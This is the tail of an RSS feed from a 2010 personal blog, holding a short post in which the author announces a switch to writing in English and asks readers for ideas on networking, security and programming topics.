		<comments>http://www.nazrek.org/index.php/2010/07/12/switching-to-english/#comments</comments>
		<pubDate>Mon, 12 Jul 2010 20:36:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Main]]></category>

		<guid isPermaLink="false">http://www.nazrek.org/?p=907</guid>
		<description><![CDATA[English is one of the most spoken languages therefor (nearly) everyone understands it hence I&#8217;m gonna switch/try to publish all of my new posts either in english AND german or just in english. So&#8230; I&#8217;ve got some spare-time to waste.. wat do? I&#8217;d like to go some in the direction of networking, security and programming. [...]]]></description>
			<content:encoded><![CDATA[<p>English is one of the most spoken languages therefor (nearly) everyone understands it hence I&#8217;m gonna switch/try to publish all of my new posts either in english AND german or just in english.</p>
<p>So&#8230; I&#8217;ve got some spare-time to waste.. wat do?<br />
I&#8217;d like to go some in the direction of networking, security and programming.<br />
But I&#8217;m kinda lacking ideas (well nah, not really.. but somehow I&#8217;m lacking the motivation to get more and more into a topic until I&#8217;m able to write a tutorial).<br />
Fell free to comment and gimme some slaps to the right direction, eh? <img src='http://www.nazrek.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>-nazrek</p>
<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Switching+to+english+http://bit.ly/aGIYg3+@nazrek" title="Post to Twitter"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-twitter-micro4.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://plurk.com/?status=Switching+to+english+http://bit.ly/aGIYg3" title="Post to Plurk"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-plurk-micro3.png" alt="Post to Plurk" /></a> <a target="_blank" class="tt" href="http://buzz.yahoo.com/submit?submitUrl=http://www.nazrek.org/index.php/2010/07/12/switching-to-english/&amp;submitHeadline=Switching+to+english" title="Post to Yahoo Buzz"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-buzz-micro4.png" alt="Post to Yahoo Buzz" /></a> <a target="_blank" class="tt" href="http://delicious.com/post?url=http://www.nazrek.org/index.php/2010/07/12/switching-to-english/&amp;title=Switching+to+english" title="Post to Delicious"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-delicious-micro3.png" alt="Post to Delicious" /></a> <a target="_blank" class="tt" href="http://digg.com/submit?url=http://www.nazrek.org/index.php/2010/07/12/switching-to-english/&amp;title=Switching+to+english" title="Post to Digg"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-digg-micro4.png" alt="Post to Digg" /></a> <a target="_blank" class="tt" href="http://www.facebook.com/share.php?u=http://www.nazrek.org/index.php/2010/07/12/switching-to-english/&amp;t=Switching+to+english" title="Post to Facebook"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-facebook-micro3.png" alt="Post to Facebook" /></a> <a target="_blank" class="tt" href="http://www.myspace.com/Modules/PostTo/Pages/?l=3&amp;u=http://www.nazrek.org/index.php/2010/07/12/switching-to-english/&amp;t=Switching+to+english" title="Post to MySpace"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-myspace-micro4.png" alt="Post to MySpace" /></a> <a target="_blank" class="tt" href="http://ping.fm/ref/?method=microblog&amp;title=Switching+to+english&amp;link=http://www.nazrek.org/index.php/2010/07/12/switching-to-english/" title="Post to Ping.fm"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-ping-micro3.png" alt="Post to Ping.fm" /></a> <a target="_blank" class="tt" href="http://reddit.com/submit?url=http://www.nazrek.org/index.php/2010/07/12/switching-to-english/&amp;title=Switching+to+english" title="Post to Reddit"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-reddit-micro4.png" alt="Post to Reddit" /></a> <a target="_blank" class="tt" href="http://stumbleupon.com/submit?url=http://www.nazrek.org/index.php/2010/07/12/switching-to-english/&amp;title=Switching+to+english" title="Post to StumbleUpon"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-su-micro3.png" alt="Post to StumbleUpon" /></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.nazrek.org/index.php/2010/07/12/switching-to-english/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
